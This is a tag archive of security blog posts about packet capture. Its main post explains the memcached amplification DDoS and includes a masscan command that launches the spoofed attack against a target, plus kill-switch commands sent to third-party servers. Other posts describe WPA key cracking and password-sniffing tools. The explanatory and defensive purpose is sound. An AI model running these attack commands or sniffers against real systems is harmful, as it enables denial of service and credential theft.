Tag Archives: pcap

Some notes on memcached DDoS

Post Syndicated from Robert Graham original http://blog.erratasec.com/2018/03/some-notes-on-memcached-ddos.html

I thought I’d write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:
masscan 0.0.0.0/0 -pU:11211 --banners | grep memcached
This example scans the entire Internet (/0). Replace 0.0.0.0/0 with your address range (or ranges).
This produces output that looks like this:
Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on 89.110.149.218: [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on 84.200.45.2: [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on 5.1.66.2: [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on 103.248.253.112: [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on 193.240.236.171: [memcached] uptime=42083736 time=1520485365 version=1.4.13
The “banners” check filters out those with valid memcached responses, so you don’t get other stuff that isn’t memcached. To filter this output further, use ‘cut’ to grab just column 6:
… | cut -d ' ' -f 6 | cut -d: -f1
You often get multiple responses to just one query, so you’ll want to sort/uniq the list:
… | sort | uniq
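Putting those pieces together, the whole thing runs as a single pipeline (a sketch, assuming the output format shown above):
masscan 0.0.0.0/0 -pU:11211 --banners | grep memcached | cut -d ' ' -f 6 | cut -d: -f1 | sort | uniq > memcached-servers.txt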

My results from an Internet wide scan

I got 15181 results (or roughly 15,000).
People are using Shodan to find a list of memcached servers. They might be getting a lot of results back for servers that respond on TCP instead of UDP. Only UDP can be used for the attack.

Other researchers scanned the Internet a few days ago and found ~31k. I don’t know if this means people have been removing these from the Internet.

Masscan as exploit script

BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.
masscan -iL amplifiers.txt -pU:11211 --spoof-ip <target-ip> --rate 100000
I point this out to show how there’s no magic in exploiting this. Numerous exploit scripts have been released, because it’s so easy.

Why memcached servers are vulnerable

Like many servers, memcached listens on the local IP address 127.0.0.1 for local administration. By listening only on the local IP address, remote people cannot talk to the server.
However, this configuration often goes wrong, and the server ends up listening on either 0.0.0.0 (all interfaces) or on one of the external interfaces. There’s a common Linux network-stack issue where this keeps happening, such as when trying to get VMs connected to the network. I forget the exact details, but the point is that lots of servers that intend to listen only on 127.0.0.1 end up listening on external interfaces instead. It’s not a good security barrier.
Thus, there are lots of memcached servers listening on their control port (11211) on external interfaces.

How the protocol works

The protocol is documented here. It’s pretty straightforward.
The easiest amplification attack is to send the “stats” command. This is a 15-byte UDP packet that causes the server to send back a large response full of useful statistics about the server. You often see around 10 kilobytes of response across several packets.
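To see what a single query returns, you can hand-craft a stats probe yourself (a sketch; 192.0.2.1 stands in for a server you control, and the leading 8 bytes are the memcached UDP frame header):
echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 192.0.2.1 11211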
A harder, but more effective, attack uses a two-step process. You first use the “add” or “set” commands to put chunks of data into the server, then send a “get” command to retrieve them. You can easily put 100 megabytes of data into the server this way, and cause its retrieval with a single “get” command.
That’s why this has been the largest amplification ever, because a single 100-byte packet can in theory cause a 100-megabyte response.
Doing the math, the 1.3 terabit/second DDoS divided across the 15,000 servers I found vulnerable on the Internet works out to an average of roughly 87 megabits/second per server. This is fairly minor, and is indeed something even small servers (like Raspberry Pis) can generate.

Neutering the attack (“kill switch”)

If they are using the more powerful attack against you, you can neuter it: you can send a “flush_all” command back at the servers that are flooding you, causing them to drop all those large chunks of data from the cache.
I’m going to describe how I would do this.
First, get a list of attackers, meaning, the amplifiers that are flooding you. The way to do this is to grab a packet sniffer and capture all packets with a source port of 11211. Here is an example using tcpdump (substitute your own interface for eth0):
tcpdump -i eth0 -w attackers.pcap udp src port 11211
Let that run for a while, then hit [ctrl-c] to stop, then extract the list of IP addresses in the capture file. The way I do this is with tshark (comes with Wireshark):
tshark -r attackers.pcap -T fields -e ip.src | sort | uniq > amplifiers.txt
Now, craft a flush_all payload. There are many ways of doing this. For example, if you are using nmap or masscan, you can add the bytes to the nmap-payloads.txt file. Also, masscan can read this directly from a packet capture file. To do this, first craft a packet, such as with the following command line foo (192.0.2.1 is just a stand-in destination; any address works while you capture):
echo -en "\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n" | nc -q1 -u 192.0.2.1 11211
Capture this packet using tcpdump or something, and save into a file “flush_all.pcap”. If you want to skip this step, I’ve already done this for you, go grab the file from GitHub:
Now that we have our list of attackers (amplifiers.txt) and a payload to blast at them (flush_all.pcap), use masscan to send it:
masscan -iL amplifiers.txt -pU:11211 --pcap-payload flush_all.pcap
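In other words, the whole kill-switch procedure end-to-end looks something like this (a sketch, assuming eth0 and the files above):
tcpdump -i eth0 -c 100000 -w attackers.pcap udp src port 11211
tshark -r attackers.pcap -T fields -e ip.src | sort | uniq > amplifiers.txt
masscan -iL amplifiers.txt -pU:11211 --pcap-payload flush_all.pcap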

Reportedly, “shutdown” may also work, completely shutting down the amplifiers. I’ll leave that as an exercise for the reader, since of course you’ll be adversely affecting the servers.

Some notes

Here is some good reading on this attack:

USBPcap – USB Packet Capture For Windows

Post Syndicated from Darknet original https://www.darknet.org.uk/2018/01/usbpcap-usb-packet-capture-windows/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

USBPcap – USB Packet Capture For Windows

USBPcap is an open-source USB Packet Capture tool for Windows that can be used together with Wireshark in order to analyse USB traffic without using a Virtual Machine.

Currently, live capture works on a “standard input” basis: you run a command in cmd.exe and Wireshark captures raw USB traffic on Windows.
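The documented pattern looks roughly like this (a sketch; the filter device name \\.\USBPcap1 varies per machine, and the Wireshark path is an assumption — check the USBPcap docs for your setup):
USBPcapCMD.exe -d \\.\USBPcap1 -o - | "C:\Program Files\Wireshark\Wireshark.exe" -k -i -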

USBPcapDriver has three “hats”:

  • Root Hub (USBPCAP_MAGIC_ROOTHUB)
  • Control (USBPCAP_MAGIC_CONTROL)
  • Device (USBPCAP_MAGIC_DEVICE)

What you won’t see using USBPcap

As USBPcap captures URBs passed between the functional device object (FDO) and the physical device object (PDO), there are some USB communications elements that you will notice only with a hardware USB sniffer.

Read the rest of USBPcap – USB Packet Capture For Windows now! Only available at Darknet.

coWPAtty Download – Audit Pre-shared WPA Keys

Post Syndicated from Darknet original https://www.darknet.org.uk/2017/12/cowpatty-audit-pre-shared-wpa-keys/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

coWPAtty Download – Audit Pre-shared WPA Keys

coWPAtty is a C-based tool for running a brute-force dictionary attack against WPA-PSK networks to audit pre-shared WPA keys.

If you are auditing WPA-PSK networks, you can use this tool to identify weak passphrases that were used to generate the PMK. Supply a libpcap capture file that includes the 4-way handshake, a dictionary file of passphrases to guess with, and the SSID for the network.
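A typical invocation looks like this (filenames and SSID are placeholders):
cowpatty -r handshake.pcap -f wordlist.txt -s "HomeNetwork"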

What is coWPAtty?

coWPAtty is the implementation of an offline dictionary attack against WPA/WPA2 networks using PSK-based authentication (e.g.

Read the rest of coWPAtty Download – Audit Pre-shared WPA Keys now! Only available at Darknet.

net-creds – Sniff Passwords From Interface or PCAP File

Post Syndicated from Darknet original https://www.darknet.org.uk/2017/12/net-creds-sniff-passwords-from-interface-or-pcap-file/?utm_source=rss&utm_medium=social&utm_campaign=darknetfeed

net-creds – Sniff Passwords From Interface or PCAP File

net-creds is a Python-based tool for sniffing plaintext passwords and hashes from a network interface or PCAP file – it doesn’t rely on port numbers for service identification and can concatenate fragmented packets.

Features of net-creds for Sniffing Passwords

It can sniff the following directly from a network interface or from a PCAP file (a usage sketch follows the list):

  • URLs visited
  • POST loads sent
  • HTTP form logins/passwords
  • HTTP basic auth logins/passwords
  • HTTP searches
  • FTP logins/passwords
  • IRC logins/passwords
  • POP logins/passwords
  • IMAP logins/passwords
  • Telnet logins/passwords
  • SMTP logins/passwords
  • SNMP community string
  • NTLMv1/v2 all supported protocols: HTTP, SMB, LDAP, etc.
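
For example, a usage sketch (interface and filenames are placeholders; check the project README for the exact flags):
sudo python net-creds.py -i eth0          # sniff live from an interface
sudo python net-creds.py -p capture.pcap  # parse an existing capture file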

Read the rest of net-creds – Sniff Passwords From Interface or PCAP File now! Only available at Darknet.

Burner laptops for DEF CON

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/07/burner-laptops-for-def-con.html

Hacker summer camp (Defcon, Blackhat, BSidesLV) is upon us, so I thought I’d write up some quick notes about bringing a “burner” laptop. A Chromebook is your best choice in terms of security, but I need Windows/Linux tools, so I got a Windows laptop.

I chose the Asus e200ha for $199 from Amazon with free (and fast) shipping. There are similar notebooks with roughly the same hardware and price from other manufacturers (HP, Dell, etc.), so I’m not sure how this compares against those other ones. However, it fits my needs as a “burner” laptop, namely:

  • cheap
  • lasts 10 hours easily on battery
  • weighs 2.2 pounds (1 kilogram)
  • 11.6 inch and thin

Some other specs are:

  • 4 gigs of RAM
  • 32 gigs of eMMC flash memory
  • quad core 1.44 GHz Intel Atom CPU
  • Windows 10
  • free Microsoft Office 365 for one year
  • good, large keyboard
  • good, large touchpad
  • USB 3.0
  • microSD
  • WiFi ac
  • no fans, completely silent

There are compromises, of course.

  • The Atom CPU is slow, though it’s only noticeable when churning through heavy webpages. Adblocking addons or Brave are a necessity. Most things are usably fast, such as using Microsoft Word.
  • Crappy sound and video, though VLC does a fine job playing movies with headphones on the airplane. Using in bright sunlight will be difficult.
  • It has micro-HDMI; keep in mind that if you intend to do presos from it, you’ll need an HDMI adapter.
  • It has limited storage, 32 gigs in theory, about half that usable.
  • It uses a special Windows 10 compressed install that you can’t actually upgrade without a completely new install. It doesn’t have the latest Windows 10 Creators update. I lost a gig thinking I could compress system files.

Copying files across the 802.11ac WiFi to the disk was quite fast, several hundred megabits per second. The eMMC isn’t as fast as an SSD, but it’s a lot faster than typical SD card speeds.

The first thing I did once I got the notebook was to install the free VeraCrypt full disk encryption. The CPU has AES acceleration, so it’s fast. There is a problem with the keyboard driver during boot that makes it really hard to enter long passwords — you have to carefully type one key at a time to prevent extra keystrokes from being entered.

You can’t really install Linux on this computer, but you can use virtual machines. I installed VirtualBox and downloaded the Kali VM. I had some problems attaching USB devices to the VM. First of all, VirtualBox requires a separate downloaded extension to get USB working. Second, it conflicts with USBpcap that I installed for Wireshark.

It comes with one year of free Office 365. Obviously, Microsoft is hoping to hook the user into a longer term commitment, but in practice next year at this time I’d get another burner $200 laptop rather than spend $99 on extending the Office 365 license.

Let’s talk about the CPU. It’s Intel’s “Atom” processor, not their mainstream (Core i3 etc.) processor. Even though it has roughly the same GHz as the processor in an 11-inch MacBook Air and twice the cores, it’s noticeably and painfully slower. This is especially noticeable on ad-heavy web pages, while other things seem to work just fine. It has hardware acceleration for most video formats, though I had trouble getting Netflix to work.

The tradeoff for a slow CPU is phenomenal battery life. It seems to last forever on battery. It’s really pretty cool.

Conclusion

A Chromebook is likely more secure, but for my needs, this $200 laptop is perfect.

Security updates for Tuesday

Post Syndicated from ris original https://lwn.net/Articles/722246/rss

Security updates have been issued by Debian (libtirpc and libytnef), Fedora (python-fedora, roundcubemail, and tnef), Mageia (ntp and virtualbox), openSUSE (dpkg, ghostscript, kernel, libressl, mysql-community-server, quagga, tcpdump, libpcap, xen, and zziplib), Red Hat (java-1.7.0-openjdk), Scientific Linux (java-1.7.0-openjdk), and SUSE (samba).

Security updates for Thursday

Post Syndicated from jake original https://lwn.net/Articles/715404/rss

Security updates have been issued by Arch Linux (bzip2, kernel, and linux-zen), CentOS (kernel), Debian (bitlbee, kernel, and tomcat7), Fedora (diffoscope, mujs, pcre, plasma-desktop, and tomcat), Mageia (libpcap/tcpdump and spice), Oracle (kernel), Red Hat (kernel, kernel-rt, and python-oslo-middleware), SUSE (php5 and util-linux), Ubuntu (imagemagick), and openSUSE (gd, kernel, libXpm, and libquicktime).

Netdiscover – Network Address Discovery Tool

Post Syndicated from Darknet original http://feedproxy.google.com/~r/darknethackers/~3/MH2xooF7SfI/

Netdiscover is a network address discovery tool that was developed mainly for those wireless networks without DHCP servers, though it also works on wired networks. It sends ARP requests and sniffs for replies. Built on top of libnet and libpcap, it can passively detect on-line hosts, or search for them, by actively sending ARP requests,…
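
Typical usage looks something like this (interface and range are placeholders):
netdiscover -i wlan0 -p                  # passive mode: just listen for ARP traffic
netdiscover -i wlan0 -r 192.168.1.0/24   # active mode: send ARP requests to a range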

Read the full post at darknet.org.uk

Configuring Raspberry Pi as a router

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/10/configuring-raspberry-pi-as-router.html

I’m setting up a little test network for IoT devices, one isolated a bit from my home network. This is a perfect job for a computer like the Raspberry Pi (or similar computers, such as the Odroid-C2, which is what I’m actually using here). I thought I’d blog the setup details in case anybody else wanted to set up their own isolated home network.
Choice of hardware

The Raspberry Pi 3 Model B is a fine choice, but there are many alternatives. I’m using the Odroid C2 instead. It’s nearly the same, but the chief difference for my purposes is that the Ethernet adapter is native. On the RPi, the Ethernet adapter is actually connected via USB. Network utilities don’t like USB Ethernet as much.
The choice of hardware dictates the operating system. Download the latest version of Ubuntu for the Odroid C2. They keep moving around where to get it, but you can google “odroid c2 downloads” to find it. My version is Ubuntu MATE 16.04 LTS.
Your home network

Your home network likely uses the addresses 192.168.1.xxx. This is also the range that most of the devices I’m testing will use as their initial defaults. Therefore, I’ve changed my network to something strange that won’t share the address range, like 10.20.30.x.
sudo bash

On the Internet, help text always prefixes sudo in front of every line. This is tedious. I just open up a root bash prompt instead. All the examples below assume that.
Reconfigure the hostname

The first step for me is always reconfiguring the hostname. I’ve got a bunch of small systems and VMs, and if I don’t remember to reset the hostname, I go crazy. You do this by editing the files /etc/hostname and /etc/hosts.
vi /etc/hostname
vi /etc/hosts
I’m naming this device odroidrouter.
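For example (a sketch, assuming the image’s default hostname is odroid64; substitute whatever yours currently is):
echo odroidrouter > /etc/hostname
sed -i 's/odroid64/odroidrouter/g' /etc/hosts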
Reconfigure networking

All these small computers seem to be using some form of Debian, which usually uses the ifupdown method of configuring the network. It’s in flux and always changing, but my current configuration looks like the following.
vi /etc/network/interfaces

auto usbnet0
allow-hotplug usbnet0
iface usbnet0 inet static
        address 10.20.30.45
        netmask 255.255.255.0
        gateway 10.20.30.1
        dns-nameservers 8.8.8.8 8.8.4.4

iface usbnet0 inet6 auto

auto eth0
allow-hotplug eth0
iface eth0 inet static
        address 192.168.1.1
        netmask 255.255.255.0
I’ve got two Ethernet interfaces, the built-in one (eth0) and the additional one I get from plugging in a USB dongle (usbnet0).
The WAN interface, the one pointing to the Internet, is usbnet0.
The local interface, the one on the isolated network, is eth0. That’s because I’m going to be running network tools like tcpdump on that interface, so I want the “real” Ethernet to be in that direction.
Turn on routing

You need to turn on the routing bit. The best way to do it is in the sysctl.conf file.
vi /etc/sysctl.conf
There’s usually a commented-out line with the parameter we want; just uncomment it. Otherwise, add the line:
net.ipv4.ip_forward=1
Note that there are many other ways of doing this. For example, routing could be off until you plug in the Ethernet cable, using the ifupdown configuration files. In that case, you’ll need a line that does something like
echo 1 > /proc/sys/net/ipv4/ip_forward
You’ll also want to run that command if you want to immediately test things out, without having to reboot.
Turn on NATting
Reconfigure the iptables firewall with the following to turn on NAT.
iptables -t nat -A POSTROUTING -o usbnet0 -j MASQUERADE
iptables -A FORWARD -i eth0 -o usbnet0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i usbnet0 -o eth0 -j ACCEPT
But these configuration changes aren’t persistent. To make them persistent, you need to install iptables-persistent.

apt-get install iptables-persistent
It’ll ask you while installing if you want to make the changes persistent. Do that. Otherwise, later you’ll need to do this:
iptables-save > /etc/iptables/rules.v4


Turn on DHCP server

Some of the devices on our isolated network come with static IP addresses, like 192.168.1.10. Some use DHCP, so we’ll need to install a DHCP server.
apt-get install isc-dhcp-server
You’ll then need to edit the configuration file. The defaults are fine, but you need to tell it which address ranges you need to give out:
subnet 192.168.1.0 netmask 255.255.255.0 {
  range 192.168.1.100 192.168.1.200;
  option routers 192.168.1.1;
  option domain-name-servers 8.8.8.8, 8.8.4.4;
  option domain-name "example.com";
}
You then want to tell the DHCP service which interface to use when serving requests, so you don’t serve them on the wrong adapter.
vi /etc/default/isc-dhcp-server
Make sure you have the following line, usually by editing the line that is already there in the defaults:
INTERFACES="eth0"
If you want to turn on DHCP before rebooting, you can start the service:
service isc-dhcp-server start
It’s easy to make a mistake with the configuration files, but dhcpd gives no error messages. To get them, you need to install syslog. It’s a pain in the ass.
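One partial workaround: dhcpd has a config-test mode that parses the file and prints any errors to the terminal, no syslog needed:
dhcpd -t -cf /etc/dhcp/dhcpd.conf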

Isolation

I want my isolated devices to get to the Internet, but I don’t want them to be able to access my internal network. Therefore, I need to add a firewall rule that prevents them from accessing my own subnet. However, this rule needs to be done so that I can still reach the router/firewall machine from my subnet. Therefore, the rule needs to be placed on the eth0 interface, and not generically in the stack or on the usbnet0 interface. Note that I use the -I directive here, to insert the dropping rule before the forwarding rules configured above.

iptables -I FORWARD -d 10.20.30.0/24 -i eth0 -j DROP

Logging into the test machine I can confirm that I can ping my local subnet before this firewall rule, but not after. But, I can still log into the gateway device from my local network.


Port forwarding

Now that I have my victim device safely on an isolated network, with outbound access to the Internet, I need to forward ports from the Internet to the victim machine. The ports that it is listening on are:

There are two steps here. First, I need to configure my home router to forward ports to this RPi router. The second step is to use IP tables to forward those ports to the target device.

One question is whether you use the same port number. In other words, I want to forward Telnet on port 23 from the Internet to this device. I could therefore write firewall rules that just change the IP address. However, in case of accidents, this is unsafe. I’d rather have a brittle configuration that’ll easily fail rather than allow hackers into my local network.

Therefore, on my firewall router, I’ve mapped port 50001 to port 23 on the target victim device.

iptables -A PREROUTING -t nat -i usbnet0 -p tcp --dport 50001 -j DNAT --to 192.168.1.10:23

On my home Internet gateway, I do the reverse, mapping Internet-visible Telnet port 23 to port 50001 on my RPi firewall. In other words, the two mappings I’ve done are:

internet:23 -> 10.20.30.45:50001
10.20.30.45:50001 -> 192.168.1.10:23


Capturing packets

Now that I’ve isolated my test device, I’ll want to monitor it. I’ll want to monitor what traffic it sends out to the Internet when I turn it on. Then, when I expose it to the Internet to get infected, I want to monitor all the traffic going into and out of it.

Because the log files can get big, I’ll want to rotate the log files. I’ve chosen to rotate them every hour. I do this with the command:

tcpdump -i eth0 -G 3600 -w 'cameradome-%Y%m%d-%H.pcap'

BTW, since I need to leave this process running in the background when I log off, I run this under a screen session. I suppose I should just run this during startup, detached as a daemon, but I’m too lazy.
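A sketch of that, using a detached screen session named “capture”:
screen -dmS capture tcpdump -i eth0 -G 3600 -w 'cameradome-%Y%m%d-%H.pcap'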

Since this is an RPi class device, I probably don’t want to log the packets to the SD card. Instead, I log them to an external USB flash drive. Thus, before executing tcpdump I did:

mkdir ~/lexar
mount /dev/sda1 ~/lexar


Rate limiting

In my setup, the isolated devices may be used to execute DDoS attacks. I don’t want that, obviously. To fix this, I can rate limit. There are various ways of traffic shaping on Linux for advanced purposes, but really, I just want something simple — anything that will stop this from being useful in a DDoS.

There are many extensions to iptables (man iptables-extensions). One is a simple extension, called limit, that limits how often a rule will match per second (or per hour, per day, etc.). The easiest way to use that extension is on the NAT rule, to limit how many connections per second can be NATted. Change the above rule to this:

iptables -A FORWARD -i eth0 -o usbnet0 -m state --state RELATED,ESTABLISHED -m limit --limit 10/sec -j ACCEPT

This is the same NAT rule as above, but we use the -m option to tell it to use the matching extension module named “limit”. Then, we use the new --limit option (works only with this module) to set a rate of 10 per second. What that means is that after this rule triggers 10 times in a second, the 11th packet in that second won’t match.

However, the packet will still be forwarded. That’s because this is the default action for iptables if no rule matches. It’ll be sent with the wrong IP address, so it can never receive responses. That’ll block TCP-based DDoS, but not those that do simple UDP and ICMP floods. We need to do something that, by default, blocks forwarded packets if no rule matches.

One way is to set the default policy for the chain named “FORWARD”:

iptables -P FORWARD DROP

This seems to block everything. I don’t know why, my iptables foo isn’t good enough. So instead, I just add a block rule that matches the NAT rule:

iptables -A FORWARD -i eth0 -o usbnet0 -j DROP

The -A parameter means to append this rule after all the others. If a rule matches before this, then iptables stops walking the chain, and never reaches this drop rule. When nothing matches, because of the rate limiting feature, then the packet will reach this rule and get dropped.
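Putting the pieces together, the full FORWARD chain from this post ends up as follows (a recap sketch; order matters, since iptables stops at the first match):
iptables -I FORWARD -d 10.20.30.0/24 -i eth0 -j DROP
iptables -A FORWARD -i eth0 -o usbnet0 -m state --state RELATED,ESTABLISHED -m limit --limit 10/sec -j ACCEPT
iptables -A FORWARD -i usbnet0 -o eth0 -j ACCEPT
iptables -A FORWARD -i eth0 -o usbnet0 -j DROP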

Secure Your Containers with this One Weird Trick (RHEL Blog)

Post Syndicated from jake original http://lwn.net/Articles/703784/rss

Over on the Red Hat Enterprise Linux Blog, Dan Walsh writes about using Linux capabilities to help secure Docker containers. “Let’s look at the default list of capabilities available to privileged processes in a docker container:

chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap.

In the OCI/runc spec they are even more drastic, only retaining audit_write, kill, and net_bind_service, and users can use ocitools to add additional capabilities. As you can imagine, I like the approach of adding capabilities you need rather than having to remember to remove capabilities you don’t.” He then goes through the capabilities listed, describing what they govern and when they might need to be turned on for a container application.

WTF Yahoo/FISA search in kernel?

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/10/wtf-yahoofisa-search-in-kernel.html

A surprising detail in the Yahoo/FISA email search scandal is that they do it with a kernel module. I thought I’d write up some (rambling) notes.

What the government was searching for

As described in the previous blog post, we’ll assume the government is searching for the following string, and possibly other strings like it, within emails:

### Begin ASRAR El Mojahedeen v2.0 Encrypted Message ###

I point this out because it’s a simple search identifying strings. It’s not natural language processing. It’s not searching for phrases like “bomb president”.

Also, it’s not AV/spam/childporn processing. Those look at different things. For example, filtering messages containing childporn involves calculating a SHA2 hash of email attachments and looking up the hashes in a table of known bad content (or even more in-depth analysis). This is quite different from searching.

The Kernel vs. User Space

Operating systems have two parts, the kernel and user space. The kernel is the operating system proper (e.g. the “Linux kernel”). The software we run is in user space, such as browsers, word processors, games, web servers, databases, GNU utilities [sic], and so on.

The kernel has raw access to the machine, memory, network devices, graphics cards, and so on. User space has virtual access to these things. The user space is the original “virtual machines”, before kernels got so bloated that we needed a third layer to virtualize them too.

This separation between kernel and user has two main benefits. The first is security, controlling which bit of software has access to what. It means, for example, that one user on the machine can’t access another’s files. The second benefit is stability: if one program crashes, the others continue to run unaffected.

Downside of a Kernel Module

Writing a search program as a kernel module (instead of a user space module) defeats the benefits of user space programs, making the machine less stable and less secure.

Moreover, the sort of thing this module does (parsing emails) has a history of big gaping security flaws. Parsing stuff in the kernel makes cybersecurity experts run away screaming in terror.

On the other hand, people have been doing security stuff (SSL implementations and anti-virus scanning) in the kernel in other situations, so it’s not unprecedented. I mean, it’s still wrong, but it’s been done before.

Upside of a Kernel Module

If doing this as a kernel module (instead of in user space) is so bad, then why does Yahoo do it? It’s probably due to the widely held, but false, belief that putting stuff in the kernel makes it faster.

Everybody knows that kernels are faster, for two reasons. First is that as a program runs, making a system call switches context, from running in user space to running in kernel space. This step is expensive/slow. Kernel modules don’t incur this expense, because code just jumps from one location in the kernel to another. The second performance issue is virtual memory, where reading memory requires an extra step in user space, to translate the virtual memory address to a physical one. Kernel modules access physical memory directly, without this extra step.

But everyone is wrong. Using features like hugepages gets rid of the virtual-memory translation cost. There are ways to mitigate the cost of user/kernel transitions, such as moving data in bulk instead of a little bit at a time. Also, CPUs have improved in recent years, dramatically reducing the cost of a kernel/user transition.

The problem we face, though, is inertia. Everyone knows moving modules into the kernel makes things faster. It’s hard getting them to un-learn what they’ve been taught.

Also, following this logic, Yahoo may already have many email handling functions in the kernel. If they’ve already gone down the route of bad design, then they’d have to do this email search as a kernel module as well, to avoid the user/kernel transition cost.

Another possible reason for the kernel-module is that it’s what the programmers knew how to do. That’s especially true if the contractor has experience with other kernel software, such as NSA implants. They might’ve read Phrack magazine on the topic, which might have been their sole education on the subject. [http://phrack.org/issues/61/13.html]

How it was probably done

I don’t know Yahoo’s infrastructure. Presumably they have front-end systems designed to balance the load (and accelerate SSL processing), and back-end systems that do the heavy processing, such as spam and virus checking.

The typical way to do this sort of thing (search) is simply to tap into the network traffic, either as a separate computer sniffing (eavesdropping on) the network, or something within the system that taps into the network traffic, such as a netfilter module. Netfilter is the Linux firewall mechanism, and has ways to easily “hook” into specific traffic, either from user space or from a kernel module. There is also a related user-space mechanism of hooking network APIs like recv() with a preloaded shared library.
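For example, the user-space variety can be wired up from the command line with iptables’ NFQUEUE target, which hands matching packets to a user-space program for inspection (a sketch; port 25 assumed for SMTP, queue number arbitrary):
iptables -A INPUT -p tcp --dport 25 -j NFQUEUE --queue-num 0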

This traditional mechanism doesn’t work as well anymore. For one thing, incoming email traffic is likely encrypted using SSL (using STARTTLS, for example). For another thing, companies are increasingly encrypting intra-data-center traffic, either with SSL or with hard-coded keys.

Therefore, instead of tapping into network traffic, the code might tap directly into the mail handling software. A good example of this is Sendmail’s milter interface, that allows the easy creation of third-party mail filtering applications, specifically for spam and anti-virus.

But it would be insane to write a milter as a kernel module, since mail handling is done in user space, thus adding unnecessary user/kernel transitions. Consequently, we make the assumption that Yahoo’s intra-data-center traffic is unencrypted, and that for the FISA search thing, they wrote something like a kernel module with netfilter hooks.

How it should’ve been done

Assuming the above guess is correct, that they used kernel netfilter hooks, there are a few alternatives.

They could do user-space netfilter hooks instead, but those do have a performance impact. They require a transition from the kernel to user space, then a second transition back into the kernel. If the system is designed for high performance, this might be a noticeable performance impact. I doubt it, as it’s still small compared to the rest of the computations involved, but it’s the sort of thing that engineers are prejudiced against, even before they measure the performance impact.

A better way of doing it is hooking the libraries. These days, most software uses shared libraries (.so) to make system calls like recv(). You can write your own shared library, and preload it. When the library function is called, you do your own processing, then call the original function.

Hooking the libraries then lets you tap into the network traffic, but without any additional kernel/user transition.
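The mechanics are simple (a sketch; hook_recv.c is a hypothetical library that exports its own recv(), logs the buffer, then calls the real recv() via dlsym, and ./mail-server is likewise a stand-in):
gcc -shared -fPIC -o hook_recv.so hook_recv.c -ldl
LD_PRELOAD=$PWD/hook_recv.so ./mail-server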

Yet another way is simple changes in the mail handling software that allow custom hooks to be written.

Third party contractors

We’ve been thinking in terms of technical solutions. There is also the problem of politics.

Almost certainly, the solution was developed by outsiders, by defense contractors like Booz-Allen. (I point them out because of the whole Snowden/Martin thing). This restricts your technical options.

You don’t want to give contractors access to your source code. Nor do you want the contractors to be making custom changes to your source code, such as adding hooks. Therefore, you are looking at external changes, such as hooking the network stack.

The advantage of a netfilter hook in the kernel is that it has the least additional impact on the system. It can be developed and thoroughly tested by Booz-Allen, then delivered to Yahoo!, who can then install it with little effort.

This is my #1 guess why this was a kernel module – it allowed the most separation between Yahoo! and a defense contractor who wrote it. In other words, there is no technical reason for it — but a political reason.

Let’s talk search

There are two ways to search things: using an NFA and using a DFA.

An NFA is the normal way of using regex, or grep. It allows complex patterns to be written, but it requires a potentially large amount of CPU power (i.e. it’s slow). It also requires backtracking within a message, thus meaning the entire email must be reassembled before searching can begin.

The DFA alternative instead creates a large table in memory, then does a single pass over a message to search. Because it does only a single pass, without backtracking, the message can be streamed through the search module, without needing to reassemble the message. In theory, anything searched by an NFA can be searched by a DFA, though in practice some unbounded regex expressions require too much memory, so DFAs usually require simpler patterns.

The DFA approach, by the way, is about 4-gbps per 2.x-GHz Intel x86 server CPU. Because no reassembly is required, it can tap directly into anything above the TCP stack, like netfilter. Or, it can tap below the TCP stack (like libpcap), but would require some logic to re-order/de-duplicate TCP packets, to present the same ordered stream as TCP.

DFAs would therefore require little or no memory. In contrast, the NFA approach will require more CPU and memory just to reassemble email messages, and the search itself would also be slower.

The naïve approach to searching is to use NFAs. It’s what most people start out with. The smart approach is to use DFAs. You see that in the evolution of the Snort intrusion detection engine, where they started out using complex NFAs and then over the years switched to the faster DFAs.

You also see it in the network processor market. These are specialized CPUs designed for things like firewalls. They advertise fast regex acceleration, but what they really do is just convert NFAs into something that is mostly a DFA, which you can do on any processor anyway. I have a low opinion of network processors, since what they accelerate are bad decisions. Correctly designed network applications don’t need any special acceleration, except maybe SSL public-key crypto.

So, what the government’s code needs to do is a very lightweight parse of the SMTP protocol in order to extract the from/to email addresses, then a very lightweight search of the message’s content in order to detect if any of the offending strings have been found. When the pattern is found, it then reports the addresses it found.

Conclusion

I don’t know Yahoo’s system for processing incoming emails. I don’t know the contents of the court order forcing them to do a search, and what needs to be secret. Therefore, I’m only making guesses here.

But they are educated guesses. Nine times out of ten, in situations similar to Yahoo’s, I’m guessing that a “kernel module” would be the most natural solution. It’s how engineers are trained to think, and it would likely be the best fit organizationally. Sure, it really REALLY annoys cybersecurity experts, but nobody cares what we think, so that doesn’t matter.

EQGRP tools are post-exploitation

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/08/eqgrp-tools-are-post-exploitation.html

A recent leak exposed hacking tools from the “Equation Group”, a group likely related to the NSA TAO (the NSA/DoD hacking group). I thought I’d write up some comments.

Despite the existence of 0days, these tools seem to be overwhelmingly post-exploitation. They aren’t the sorts of tools you use to break into a network — but the sorts of tools you use afterwards.

The focus of the tools appears to be hacking into network equipment, installing implants, achieving permanence, and using the equipment to sniff network traffic.

